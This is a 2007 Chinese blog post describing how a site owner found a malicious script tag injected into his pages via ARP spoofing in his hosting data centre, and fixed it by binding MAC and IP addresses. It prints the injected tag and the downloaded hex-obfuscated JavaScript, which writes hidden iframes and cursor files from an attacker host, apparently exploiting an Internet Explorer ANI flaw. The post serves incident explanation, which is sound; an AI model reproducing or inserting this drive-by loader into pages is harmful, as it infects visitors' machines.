网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
javascript json 新手入门文档
Dec 03 Javascript
jquery触发a标签跳转事件示例代码
Jul 21 Javascript
JS获取键盘上任意按键的值(实例代码)
Nov 12 Javascript
以WordPress为例讲解jQuery美化页面Title的方法
May 23 Javascript
jQuery Easyui Datagrid实现单行的上移下移及保存移动的结果
Aug 15 Javascript
JavaScript实现的微信二维码图片生成器的示例
Oct 26 Javascript
原生js实现下拉框功能(支持键盘事件)
Jan 13 Javascript
详解node.js中的npm和webpack配置方法
Jan 21 Javascript
微信小程序实现自定义modal弹窗封装的方法
Jun 15 Javascript
H5+C3+JS实现五子棋游戏(AI篇)
May 28 Javascript
vue+Element-ui实现分页效果实例代码详解
Dec 10 Javascript
解析原生JS getComputedStyle
May 25 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
一个自定义位数的php多用户计数器代码
2007/03/11 PHP
一个简单的PHP&amp;MYSQL留言板源码
2020/07/19 PHP
PHP读取数据库并按照中文名称进行排序实现代码
2013/01/29 PHP
实用的PHP带公钥加密类分享(每次加密结果都不一样哦)
2014/08/20 PHP
php访问数组最后一个元素的函数end()用法
2015/03/18 PHP
php投票系统之增加与删除投票(管理员篇)
2016/07/01 PHP
PHP中常用的三种设计模式详解【单例模式、工厂模式、观察者模式】
2019/06/14 PHP
Mootools 1.2教程 Fx.Tween的使用
2009/09/15 Javascript
YUI的Tab切换实现代码
2010/04/11 Javascript
基于jquery的动态创建表格的插件
2011/04/05 Javascript
jquery阻止冒泡事件使用模拟事件
2013/09/06 Javascript
JS实现动态给图片添加边框的方法
2015/04/01 Javascript
JavaScript实现图片DIV竖向滑动的方法
2015/04/25 Javascript
javascript中alert()与console.log()的区别
2015/08/26 Javascript
牛叉的Jquery——Jquery与DOM对象的互相转换及DOM的三种操作
2015/10/29 Javascript
基于jquery步骤进度条源码分享
2015/11/12 Javascript
浅谈JavaScript的内置对象和浏览器对象
2016/06/03 Javascript
node的process以及child_process模块学习笔记
2018/03/06 Javascript
angularjs 缓存的使用详解
2018/03/19 Javascript
mpvue网易云短信接口实现小程序短信登录的示例代码
2020/04/03 Javascript
js+canvas绘制图形验证码
2020/09/21 Javascript
Python中为什么要用self探讨
2015/04/14 Python
python安装教程 Pycharm安装详细教程
2017/05/02 Python
Python 含参构造函数实例详解
2017/05/25 Python
Python随机生成均匀分布在单位圆内的点代码示例
2017/11/13 Python
用Python将结果保存为xlsx的方法
2019/01/28 Python
Python使用reportlab模块生成PDF格式的文档
2019/03/11 Python
wxPython实现整点报时
2019/11/18 Python
pycharm 多行批量缩进和反向缩进快捷键介绍
2021/01/15 Python
美国一家主营日韩美妆护肤品的在线商店:iMomoko
2016/09/11 全球购物
最常使用的求职信
2014/05/25 职场文书
2014小学生国庆65周年演讲稿
2014/09/21 职场文书
四风问题对照检查材料整改措施
2014/09/27 职场文书
技术员个人工作总结
2015/03/03 职场文书
2016年暑期教师培训心得体会
2016/01/09 职场文书
在pycharm中无法import所安装的库解决方案
2021/05/31 Python